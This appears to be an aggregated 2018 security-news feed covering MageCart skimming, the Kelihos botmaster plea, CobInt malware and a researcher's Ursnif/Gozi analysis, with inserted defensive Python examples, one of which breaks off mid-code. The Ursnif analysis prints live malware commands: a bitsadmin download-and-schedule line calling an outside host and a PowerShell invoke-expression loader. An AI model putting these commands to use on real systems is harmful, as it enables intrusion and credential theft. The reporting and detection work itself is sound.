Pierluigi Paganini

(Security Affairs – Bristol Airport, hacking)

The post Cyber attack took offline flight display screens at the Bristol Airport appeared first on Security Affairs.




Feedify cloud service architecture compromised by MageCart crime gang

MageCart cyber gang compromised the cloud service firm Feedify and stole payment card data from customers of hundreds of e-commerce sites.

The MageCart crime gang appears very active in this period: payment card data from customers of hundreds of e-commerce websites may have been stolen due to the compromise of the cloud service firm Feedify.

Cloud service firm Feedify has over 4,000 customers; it is a cloud platform that lets its customers engage their own clients with tools that target them based on their behavior.

Feedify relies on a JavaScript script that its customers add to their websites to use the service, and MageCart hackers compromised the supply chain behind that service. The script loads various resources from Feedify’s infrastructure, including a library named “feedbackembad-min-1.0.js,” which was compromised by MageCart.


Every visitor to a page of a Feedify customer's e-commerce site would load the malicious script, which allowed the crooks to siphon personal information and payment card data.

The group has been active since at least 2015 and compromised many e-commerce websites to steal payment card and other sensitive data.

The group injects a skimmer script in the target websites to siphon payment card data, once the attackers succeed in compromising a site, it will add an embedded piece of Javascript to the HTML template. Below an example script dubbed MagentoCore.

<script type="text/javascript" src="hxxps://magentocore.net/mage/mage.js"></script>

This script records keystrokes from customers and sends them to a server controlled by the attacker.

Typically, hackers attempt to compromise third-party components that give them access to a large number of websites at once.

According to the security firm RiskIQ, the MageCart group carried out a targeted attack against British Airways and used a customized version of the script to stay under the radar.

Using the same tactic, MageCart compromised the websites using the Feedify service by injecting its malicious code into a library that the Feedify script served to customers' websites.

According to the experts from RiskIQ, MageCart hackers might have had access to the Feedify servers for nearly a month.

Once notified of the compromise, Feedify removed the malicious script, but apparently the hackers re-infected the library.

The events demonstrate the ability of the MageCart crime gang to compromise the infrastructure of its victims.
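The defence a site owner has against a third-party library being swapped under them is to pin the reviewed copy with Subresource Integrity and to keep checking what the vendor's CDN actually serves. The following is an added example, not Feedify's code and not code from the article: it computes the integrity value for a reviewed script, verifies a served copy against it, flags copies that drift (the remove-then-re-infect sequence described above shows up as two separate drifts), and lists any external hosts a script tries to load code from. The script bodies and the host names (cdn.vendor.invalid, skimmer.invalid) are constructed sample data.

```python
"""Added example, not Feedify's or the article's code: pin a third-party
script with Subresource Integrity (SRI) and detect when the copy a CDN
serves no longer matches the reviewed one. Script bodies and host names
below are constructed sample data."""
import base64
import hashlib
import hmac
import re

# Constructed stand-in for a reviewed copy of a vendor library.
KNOWN_GOOD = b"(function(){window.vendorWidget={init:function(){}};})();"

# Constructed stand-in for the same library with a loader for a skimmer
# appended; skimmer.invalid is a placeholder, not a real host.
TAMPERED = KNOWN_GOOD + (
    b"\n(function(){var s=document.createElement('script');"
    b"s.src='https://skimmer.invalid/mage.js';document.head.appendChild(s);})();"
)


def sri_value(body: bytes, algo: str = "sha384") -> str:
    """Return the value for a <script integrity=...> attribute."""
    if algo not in ("sha256", "sha384", "sha512"):
        raise ValueError("SRI permits only sha256, sha384 or sha512")
    digest = hashlib.new(algo, body).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(src: str, body: bytes) -> str:
    """Build the tag a site should embed instead of a bare <script src>."""
    return (f'<script src="{src}" integrity="{sri_value(body)}" '
            f'crossorigin="anonymous"></script>')


def verify_integrity(pinned: str, served: bytes) -> bool:
    """True only if the served bytes hash to the pinned SRI value."""
    algo = pinned.split("-", 1)[0]
    try:
        return hmac.compare_digest(sri_value(served, algo), pinned)
    except ValueError:          # unsupported algorithm in the pin
        return False


_SRC_RE = re.compile(r"""src\s*=\s*['"]https?://([^'"/]+)""", re.I)


def foreign_script_hosts(body: bytes, allowed_hosts: set) -> list:
    """Hosts that a script tries to load code from, beyond the allow list."""
    text = body.decode("utf-8", "replace")
    found = []
    for m in _SRC_RE.finditer(text):
        host = m.group(1).lower()
        if host not in allowed_hosts and host not in found:
            found.append(host)
    return found


def changed_snapshots(pinned: str, snapshots: list) -> list:
    """Indices of fetched copies that drifted from the pinned hash. A clean
    copy followed by a changed one again is the re-infection case."""
    return [i for i, body in enumerate(snapshots)
            if not verify_integrity(pinned, body)]


if __name__ == "__main__":
    pinned = sri_value(KNOWN_GOOD)
    print(script_tag("https://cdn.vendor.invalid/widget.js", KNOWN_GOOD))
    # Simulated fetch history: clean, tampered, cleaned up, tampered again.
    print(changed_snapshots(pinned, [KNOWN_GOOD, TAMPERED, KNOWN_GOOD, TAMPERED]))
    print(foreign_script_hosts(TAMPERED, {"cdn.vendor.invalid"}))
```

With the integrity attribute in place a browser refuses to run a copy whose hash does not match, so a tampered library breaks the widget instead of silently skimming the checkout page; a legitimate vendor update then has to be reviewed and re-pinned, which is the point. The host scan is a coarse second check and only catches loaders written as plain `src=` assignments.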

In August, security expert Willem de Groot discovered that the MagentoCore skimmer had at that time already infected 7,339 Magento stores.

At the time, a query on the PublicWWW service showed the MagentoCore script deployed on 5,214 domains; the number of compromised websites is still high (4,762) despite the awareness campaign.

Pierluigi Paganini

(Security Affairs – cybercrime, MageCart)

The post Feedify cloud service architecture compromised by MageCart crime gang appeared first on Security Affairs.

Security Affairs newsletter Round 180 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online with a special deal

20% discount

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

·      Domestic Kitten – An Iranian surveillance operation under the radar since 2016
·      The main source of infection on ICS systems was the internet in H1 2018
·      A growing number of iOS apps collect and sell location data
·      Chinese LuckyMouse APT has been using a digitally signed network filtering driver in recent attacks
·      Fallout exploit kit appeared in the threat landscape in malvertising campaigns
·      GAO Report shed the lights on the failures behind the Equifax hack
·      Mirai and Gafgyt target Apache Struts and SonicWall to hit enterprises
·      Adobe Patch Tuesday for September 2018 fixes 10 flaws in Flash Player and ColdFusion
·      MageCart crime gang is behind the British Airways data breach
·      Other 3,700 MikroTik Routers compromised in cryptoJacking campaigns
·      Trend Micro Apps removed from Mac App Store after being caught exfiltrating user data
·      Zerodium disclose exploit for NoScript bug in version 7 of Tor Browser
·      Cyber Defense Magazine – September 2018 has arrived. Enjoy it!
·      Microsoft Patch Tuesday updates for September 2018 also address recently disclosed Windows zero-day
·      Researchers show how to clone Tesla S Key Fobs in a few seconds
·      September 2018 Security Notes address a total of 14 flaws in SAP products
·      Cobalt crime gang is using again CobInt malware in attacks on former soviet states
·      Flaws in firmware expose almost any modern PC to Cold Boot Attacks
·      ICS CERT warns of several flaws Fuji Electric Fuji Electric V-Server
·      ICS CERT warns of several flaws in Fuji Electric V-Server
·      New PyLocky Ransomware stands out for anti-machine learning capability
·      Iran-Linked OilRig APT group targets high-ranking office in a Middle Eastern nation
·      Kelihos botmaster pleads guilty in U.S. District Court in Connecticut
·      Operator at kayo.moe found a 42M Record Credential Stuffing Data ready to use
·      China-linked APT10 group behind new attacks on the Japanese media sector
·      Dutch expelled two Russian spies over hack plan on Swiss lab working on Skripal case
·      Experts disclose a Webroot SecureAnywhere macOS Kernel Level bug found months ago

Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 180 – News of the week appeared first on Security Affairs.



Canadian town forced to pay Bitcoin after nasty ransomware attack

By Uzair Amir

The town of Midland, Ontario, Canada, has decided to pay cybercriminals after its servers were targeted and infected with a nasty ransomware on Saturday, September 1, at approximately 2 a.m. The total amount of ransom payment has not been disclosed but the demand from cybercriminals was that they must be paid in Bitcoin if the town wants […]

This is a post from HackRead.com Read the original post: Canadian town forced to pay Bitcoin after nasty ransomware attack

Kelihos botmaster pleads guilty in U.S. District Court in Connecticut

The creator of the infamous Kelihos Botnet, Peter Yuryevich Levashov (38) pleaded guilty this week to computer crime, fraud, conspiracy and identity theft charges.

Peter Yuryevich Levashov (38), the botmaster of the dreaded Kelihos botnet, pleaded guilty this week to computer crime, fraud, conspiracy and identity theft charges.

In April 2017, the United States Department of Justice announced that Peter Yuryevich Levashov (36) (also known as Petr Levashov, Peter Severa, Petr Severa and Sergey Astakhov) was arrested in Barcelona for his involvement with the infamous Kelihos botnet. Levashov was extradited to the United States in February.

“Peter Yuryevich Levashov, aka “Petr Levashov,” “Peter Severa,” “Petr Severa” and “Sergey Astakhov,” 38, of St. Petersburg, Russia, pleaded guilty today in U.S. District Court in Hartford, Connecticut, to offenses stemming from his operation of the Kelihos botnet, which he used to facilitate malicious activities including harvesting login credentials, distributing bulk spam e-mails, and installing ransomware and other malicious software.” states the press release published by the DoJ.

Levashov on Wednesday pleaded guilty in U.S. District Court in Hartford, Connecticut, to one count of causing intentional damage to a protected computer, one count of conspiracy, one count of aggravated identity theft, and one count of wire fraud.


According to a study conducted by Check Point, the malware landscape showed some interesting changes in the first part of 2017.

The Kelihos botnet climbed to the top position, while the Conficker worm dropped to fourth on the malware chart.

Levashov has operated several botnets since the late 1990s; two other botnets, tracked as Storm and Waledac, share code with Kelihos, and both have been attributed to Levashov.

“For over two decades, Peter Levashov operated botnets which enabled him to harvest personal information from infected computers, disseminate spam, and distribute malware used to facilitate multiple scams,” said Assistant Attorney General Benczkowski.

“Mr. Levashov used the Kelihos botnet to distribute thousands of spam e-mails, harvest login credentials, and install malicious software on computers around the world,” said U.S. Attorney Durham. “He also participated in online forums on which stolen identities, credit card information and cybercrime tools were traded and sold. For years, Mr. Levashov lived quite comfortably while his criminal behavior disrupted the lives of thousands of computer users.”

The DoJ speculated Levashov sent spam urging recipients to buy shares as part of a “pump and dump” scam, among other naughtiness.

The Russian hacker was accused of having used the Kelihos botnet for spam campaigns that advertised various criminal schemes, including pump-and-dump stock fraud.

The activity conducted by the Kelihos, Storm and Waledac botnets was very profitable; prosecutors believe it allowed crooks to earn hundreds of millions of dollars.

“For years, Mr. Levashov lived quite comfortably while his criminal behavior disrupted the lives of thousands of computer users,” said U.S. Attorney John H. Durham of the District of Connecticut. “Thanks to the collaborative work of the FBI and our partners in law enforcement, private industry and academia, a prolific cybercriminal has been neutralized, and has now admitted his guilt in a U.S. courtroom.”

Sentencing has been scheduled for September 6, 2019, likely because the man is now helping law enforcement agencies with investigations into other cybercrime operations.

Pierluigi Paganini

(Security Affairs – Kelihos, malware)

The post Kelihos botmaster pleads guilty in U.S. District Court in Connecticut appeared first on Security Affairs.

Russian Cybercriminal Pleads Guilty to Operating Kelihos Botnet

By Uzair Amir

A Russian national, namely Peter Yuryevich Levashov, has pleaded guilty to operating the Kelihos botnet, which was used to launch a huge spamming and credential stealing campaign across the globe. Levashov, a 38-year old resident of St. Petersburg, Russia, was presented before a Connecticut US District Court and admitted to being involved in a large […]

This is a post from HackRead.com Read the original post: Russian Cybercriminal Pleads Guilty to Operating Kelihos Botnet

Phished credentials caused twice as many breaches than malware in the past year

Personal device use for remote work poses the biggest security risk to organisations safeguarding their increasingly mobile and cloud-based IT environment, according to a new survey of 100 UK-based senior

The post Phished credentials caused twice as many breaches than malware in the past year appeared first on The Cyber Security Place.

Cobalt crime gang is using again CobInt malware in attacks on former soviet states

The Russian Cobalt crime gang was particularly active in the last month; a new report confirms massive use of the CobInt malware in recent attacks.

Security researchers from Proofpoint reported the massive use of the CobInt malware by the Cobalt group in recent attacks. The CobInt name is based on the association of the malware with the “Cobalt Group” and on the internal DLL name “int.dll” found in some of the samples detected by the experts.

On August 13, 2018, security experts from Netscout’s ASERT uncovered a new campaign carried out by the Cobalt crime gang. The hackers also targeted NS Bank in Russia and Carpatica/Patria in Romania.

The Cobalt crime gang has been active since at least 2016 and has targeted banks worldwide; the group compromises target systems through spear-phishing emails that spoof messages from financial institutions or from a financial supplier/partner.

The attackers exploited several vulnerabilities in Microsoft Office, including CVE-2017-8570, CVE-2017-11882, and CVE-2018-0802.

The group also targeted entities in other sectors, including government agencies, telcos, Internet service providers, manufacturing, entertainment, and companies in the healthcare industry.

Early this year the group used CobInt as a first-stage downloader, but in later attacks the crew stopped using it. CobInt is a multi-stage malware dropped by the group via malicious Office documents created with the ThreadKit builder kit.

The Cobalt crime gang has used the CobInt backdoor again in many attacks since July, including the attacks aimed at the Russian and Romanian banks.

In August, Proofpoint experts observed at least four campaigns of the group leveraging the CobInt malware.

“We have also observed an actor commonly known as Cobalt Gang (or Group) using another new downloader that shares many of these characteristics since early 2018. Group-IB named this malware “CobInt” and released a report on its use by Cobalt Gang in May [3]. While we noticed that Cobalt Gang appeared to stop using CobInt as a first-stage downloader around the time researchers at Group-IB published their findings, they have since returned to using the downloader as of July.” reads the analysis published by Proofpoint.

Below is the list of attacks carried out by the Cobalt crime gang in the last weeks:

Date | Description | CVE
August 2, 2018 | Attackers used messages with the subject “Подозрение на мошенничество” (translated from Russian: “Suspicion of fraud”) purporting to be from “Interkassa”, using a sender email address with the lookalike domain “denis[@]inter-kassa[.]com”. |
August 14, 2018 | Attackers used messages spoofing the Single Euro Payments Area (SEPA), with lookalike sender domains sepa-europa[.]com or sepa-europa[.]info and subjects such as “notification”, “letter”, “message”, and “notice”. The messages (Figure 1) contained: | CVE-2017-8570, CVE-2017-11882, or CVE-2018-0802
August 16, 2018 | Attackers used messages purporting to be from Alfa Bank, using the lookalike domain aifabank[.]com and subjects such as “Fraud Control”, “Фрауд” (translates to “Fraud”), “Предотвращение хищения” (translates to “Prevention of theft”), and “Блокирование транзакций” (translates to “Transaction Blocking”). | CVE-2017-8570, CVE-2017-11882, or CVE-2018-0802
September 4, 2018 | Attackers used messages purporting to be from Raiffeisen Bank, using the lookalike sender domain ralffeisen[.]com and subjects such as “Fraudulent transaction”, “Wire Transfer Fraud”, and “Request for data”. | CVE-2018-8174

Malware analysis reveals that the CobInt is a downloader written in C that can be broken up into three stages: an initial downloader for the core component, the core component, and several additional modules.

The first stage downloader disguises its activity by the use of Windows API function hashing and downloads the second stage via HTTPS.

The main component downloads and executes various modules from its C&C. C&C hosts are stored in a 64-byte chunk of encrypted data that can be decrypted by XORing with a 64-byte XOR key.
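The decryption step just described, as an added example that is neither Proofpoint's code nor CobInt's: an analyst who has located the 64-byte key in a sample can recover the C&C host names from the encrypted 64-byte block with a single XOR pass, and should sanity-check the result before trusting it, since a wrong key produces garbage that still "decrypts". The key, the host names (example.invalid placeholders) and the NUL-separated layout below are constructed for this example; the real key and configuration layout are not on the page.

```python
"""Added example, not Proofpoint's code and not CobInt's: recover C&C host
names from a configuration block that is XOR-encrypted with a 64-byte key,
the scheme the article attributes to CobInt's core component. The key, the
host names and the NUL-separated layout are constructed for this example."""
import re

BLOCK = 64

# Constructed key: deterministic so the example is reproducible.
SAMPLE_KEY = bytes((i * 73 + 11) & 0xFF for i in range(BLOCK))
SAMPLE_HOSTS = ["c2-one.example.invalid", "c2-two.example.invalid"]

# Loose hostname shape used as the plausibility check.
_HOST_RE = re.compile(
    r"^[a-z0-9](?:[a-z0-9-]*[a-z0-9])?(?:\.[a-z0-9-]+)*\.[a-z]{2,}$")


def xor_block(data: bytes, key: bytes) -> bytes:
    """XOR a 64-byte block with a 64-byte key (encrypts and decrypts alike)."""
    if len(key) != BLOCK or len(data) != BLOCK:
        raise ValueError("data and key must both be exactly 64 bytes")
    return bytes(d ^ k for d, k in zip(data, key))


def encode_hosts(hosts, key=SAMPLE_KEY) -> bytes:
    """Build a sample encrypted block; used here only to construct test data."""
    plain = b"\x00".join(h.encode("ascii") for h in hosts)
    if len(plain) > BLOCK:
        raise ValueError("host list does not fit in one block")
    return xor_block(plain.ljust(BLOCK, b"\x00"), key)


def decode_hosts(blob: bytes, key: bytes) -> list:
    """Decrypt the block and split on NUL; returns raw strings, possibly junk."""
    plain = xor_block(blob, key)
    return [chunk.decode("latin-1") for chunk in plain.split(b"\x00") if chunk]


def plausible_hosts(items) -> bool:
    """Sanity check an analyst applies before trusting a decrypted config:
    every chunk must look like a hostname, otherwise the key is wrong."""
    return bool(items) and all(_HOST_RE.match(s) for s in items)


# Constructed encrypted block standing in for the one carved from a sample.
SAMPLE_BLOB = encode_hosts(SAMPLE_HOSTS)

if __name__ == "__main__":
    hosts = decode_hosts(SAMPLE_BLOB, SAMPLE_KEY)
    print(hosts, plausible_hosts(hosts))
    # A wrong key (all zeros) yields bytes that fail the hostname check.
    print(plausible_hosts(decode_hosts(SAMPLE_BLOB, bytes(BLOCK))))
```

The plausibility check is what turns this from a one-line XOR into something useful in a triage pipeline: run it over every 64-byte candidate key carved from the binary and keep only the key whose output is a clean host list, then feed those hosts to blocking and hunting.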

The malware supports the following commands:

  • load/execute module;
  • stop polling C&C;
  • execute function set by module;
  • update C&C polling wait time.

These, Proofpoint notes, are reconnaissance steps that the attackers are likely to follow with the deployment of additional modules to the compromised systems of interest.

“CobInt provides additional evidence that threat actors — from newer players we featured in our AdvisorsBot blog to established actors like TA505 and Cobalt Group– are increasingly looking to stealthy downloaders to initially infect systems and then only install additional malware on systems of interest.” Proofpoint concludes.

“As defenses improve across the board, threat actors must innovate to improve the returns on their investments in malware and infection vectors, making this approach consistent with the “follow the money” theme we have associated with a range of financially motivated campaigns over the years. This appears to be the latest trend as threat actors look to increase their effectiveness and differentiate final payloads based on user profiles” 

Further details, including IoCs, are reported in the analysis published by Proofpoint.

Pierluigi Paganini

(Security Affairs – Cobalt crime gang, hacking)

The post Cobalt crime gang is using again CobInt malware in attacks on former soviet states appeared first on Security Affairs.

Air-conditioned apocalypse: A blackout scenario involving smart climate control devices

By David Balaban

Science fiction movies often depict various situations related to cybercriminals’ activity. These can include predicaments where threat actors disrupt the transportation system of a large city or cause power outages in entire regions. In fact, this is beyond science fiction these days – impacting the power grid isn’t that difficult. The only viable way to […]

This is a post from HackRead.com Read the original post: Air-conditioned apocalypse: A blackout scenario involving smart climate control devices

Teen arrested for DDoS attack on ProtonMail & making fake bomb threats

By Waqas

ProtonMail, a Swiss-based end-to-end email encryption service, has announced the name of one of the attackers involved in the DDoS attack against the company earlier this year. Due to the attack, the email service of ProtonMail stopped responding for a minute several times despite having adequate mitigation measures in place. The identified hacker, a teenager […]

This is a post from HackRead.com Read the original post: Teen arrested for DDoS attack on ProtonMail & making fake bomb threats

U.S. Charges North Korean Spy Over WannaCry and Sony Pictures Hack

The U.S. Department of Justice announces criminal charges against a North Korean government spy in connection with the 2017 global WannaCry ransomware attack and the 2014 Sony Pictures Entertainment hack. According to multiple government officials cited by the NY Times who are familiar with the indictment, the charges would be brought against Park Jin Hyok, who works for North Korean military

Hacking The Hacker. Stopping a big botnet targeting USA, Canada and Italy

Today I'd like to share a full path analysis, including a kickback attack, which took me to gain full access to an entire Ursnif/Gozi botnet.

  In other words:  from a simple "Malware Sample" to "Pwn the Attacker Infrastructure".

NB: Federal Police have already been alerted on this topic, as well as national and international CERTs/CSIRTs (on August 26/27 2018). Attacked companies and compromised hosts should already have been reached out to. If you have had no idea about this topic until now, it means, with high probability, that you/your company are not involved in that threat. I am not going to publicly disclose the victims' IPs.

This disclosure follows the ethical disclosure procedure, which is close to the responsible disclosure procedure but mainly focused on incidents rather than on vulnerabilities.

Since blogging is not my business (I write on my personal blog to share knowledge on cyber security), I will describe some of the main steps that took me to own the attacker infrastructure. I will not disclose the malware code, nor the malware command and control code, nor details on the attacker's group, since I won't hand future attackers new malware source code ready to be used.

My entire "Cyber adventure" began with a simple email carrying a .ZIP file named "Nuovo Documento1.zip" as an apparently normal attachment (sha256: 79005f3a6aeb96fec7f3f9e812e1f199202e813c82d254b8cc3f621ea1372041). Inside the ZIP was a .VBS file (sha256: 42a7b1ecb39db95a9df1fc8a57e7b16a5ae88659e57b92904ac1fe7cc81acc0d) which, at the time (August 21, 2018), was totally unknown to VirusTotal (unknown = not yet analysed) and was ready to be started with a double click. The VisualBasic Script (Stage1) was heavily obfuscated in order to defeat simple reverse engineering analyses, but I do like de-obfuscating hidden code (every time it's like a personal challenge). After some hard-working minutes ( :D ) Stage1 was totally de-obfuscated and ready to be read in plain text. It became clear to me that Stage1 was in charge of evading three main AVs, Kaspersky Lab, Panda Security and Trend Micro, by running simple checks on the Microsoft registry, and of dropping and executing additional software.

Stage1. Obfuscation
Indeed, if none of the searched AVs were found on the target system, Stage1 acted as a simple downloader. The specific actions performed follow:
"C:\Windows\System32\cmd.exe" /c bitsadmin /transfer msd5 /priority foreground http://englandlistings.com/pagverd75.php C:\Users\J8913~1.SEA\AppData\Local\Temp/rEOuvWkRP.exe &schtasks /create /st 01:36 /sc once /tn srx3 /tr C:\Users\J8913~1.SEA\AppData\Local\Temp/rEOuvWkRP.exe
Stage1 dropped and executed a brand new PE file named rEOuvWkRP.exe (sha256: 92f59c431fbf79bf23cff65d0c4787d0b9e223493edc51a4bbd3c88a5b30b05c) using the native Microsoft program bitsadmin.exe. BitsAdmin.exe is a command-line tool that system admins can use to create download or upload jobs and monitor their progress over time. This technique has been widely used by the Anunak APT during bank frauds in the past few years.

The Stage2 analysis (a huge step ahead here) brought me to an additional brand new drop-and-decrypt stager. Stage3 introduced additional layers of anti-reverse engineering. The following image shows the additional PE section with high entropy, which is a significant indication of decrypter activity.

Stage2. Drop and decrypt Stage3. You might appreciate the high entropy on the added section

Indeed Stage 3 (sha256: 84f3a18c5a0dd9af884293a1260dce1b88fc0b743202258ca1097d14a3c9d08e) was packed as well. The UPX algorithm was used to hide the real payload, so that many AV engines were not able to detect it since the signature differed from the original payload. Finally, the unpacked payload presented many interesting features; for example, it was weaponised with evasion techniques such as: timing delay (through sleep), loop delay by calling the GetSystemTimeAsFileTime API 9979141 times, BIOS version harvesting, system manufacturer information and system fingerprinting to check whether it was running in a virtual or physical environment. It installed itself in the Windows auto-run registry to gain persistence on the victim machine. The following action was performed while running with the background flag:
cmd.exe /C powershell invoke-expression([System.Text.Encoding]::ASCII.GetString((get-itemproperty 'HKCU:\Software\AppDataLow\Software\Microsoft\4CA108BF-3B6C-5EF4-2540-9F72297443C6').Audibrkr))

The final payload executed the following commands and spawned two main services (WSearch, WerSvc) on the target.
"C:\Users\J8913~1.SEA\AppData\Local\Temp\2e6d628189703d9ad4db9e9d164775bd.exe"
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
\\?\C:\Windows\system32\wbem\WMIADAP.EXE wmiadap.exe /F /T /R
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:209921 /prefetch:2
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:406536 /prefetch:2
C:\Windows\system32\rundll32.exe C:\Windows\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:264 WinX:0 WinY:0 IEFrame:0000000000000000
C:\Windows\system32\rundll32.exe C:\Windows\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:65800 WinX:0 WinY:0 IEFrame:0000000000000000
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3004 CREDAT:209921 /prefetch:2
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3004 CREDAT:144390 /prefetch:2
C:\Windows\system32\SearchIndexer.exe /Embedding
taskhost.exe SYSTEM
C:\Windows\System32\wsqmcons.exe
taskhost.exe $(Arg0)
C:\Windows\System32\svchost.exe -k WerSvcGroup
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
"C:\Windows\system32\SearchFilterHost.exe" 0 552 556 564 65536 560
"C:\Windows\sysWow64\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11082_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11082 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"  "1"
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11083_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11083 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"  "1"
"C:\Windows\sysWow64\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11084_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11084 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"  "1"
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe5_ Global\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
"C:\Windows\sysWow64\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11086_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11086 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"  "1"
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11087_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11087 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"  "1"
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe8_ Global\UsGthrCtrlFltPipeMssGthrPipe8 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:592 CREDAT:209921 /prefetch:2
cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\J8913~1.SEA\AppData\Local\Temp\34B0.bi1"
cmd /C "echo -------- >> C:\Users\J8913~1.SEA\AppData\Local\Temp\34B0.bi1"
C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader"
C:\Windows\system32\WerFault.exe -u -p 2524 -s 288
"C:\Windows\system32\wermgr.exe" "-queuereporting_svc" "C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_taskhost.exe_82b9a110b3b94c55171865162b471ffb8fadc7c6_cab_0ab86b12"
nslookup  myip.opendns.com resolver1.opendns.com

Stage 3 finally connects back to the C2s once it has checked its own IP address. Two main C2s were observed:

    • C2 level_1 (for domains and IPs check the IoC section). Stage 3 connects back to C2 level_1 to get weaponised. Level_1 Command and Controls get information on victims and deliver plugins to expand the infection's functionality.
    • C2 level_2 (for domains and IPs check the IoC section). Stage 3 indirectly connects to C2 level_2 in order to hand over stolen information. It is Ursnif/Gozi and it exfiltrates user credentials by looking for specific files, grabbing the user's clipboard and by performing man-in-the-browser attacks against major websites such as PayPal, Gmail, Microsoft and many other online services.
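As an added example (not part of the original analysis), the command lines listed above can be turned into detection logic: the rules below flag the OpenDNS self-IP lookup, the deletion of the CEIP uploader task and shell output staged in the user's Temp folder, and tie the lookup to the file it was written to. The process-creation events, PIDs and field names are constructed assumptions in a Sysmon-like shape.

```python
import re
from typing import Dict, List

# Constructed process-creation events (Sysmon Event ID 1 style, reduced to the
# fields the rules need). They mirror the command lines quoted in the analysis
# plus some benign noise; they are not real telemetry.
SAMPLE_EVENTS = [
    {"pid": 2100, "ppid": 1300, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\J8913~1.SEA\AppData\Local\Temp\34B0.bi1"'},
    {"pid": 2101, "ppid": 1300, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd /C "echo -------- >> C:\Users\J8913~1.SEA\AppData\Local\Temp\34B0.bi1"'},
    {"pid": 2102, "ppid": 1300, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader"'},
    {"pid": 2103, "ppid": 800, "image": r"C:\Windows\System32\SearchProtocolHost.exe",
     "cmdline": r'"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe5_ Global\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646'},
    {"pid": 2104, "ppid": 4400, "image": r"C:\Windows\System32\nslookup.exe",
     "cmdline": r"nslookup www.example.com"},
]

# The implant learns its public address before calling home.
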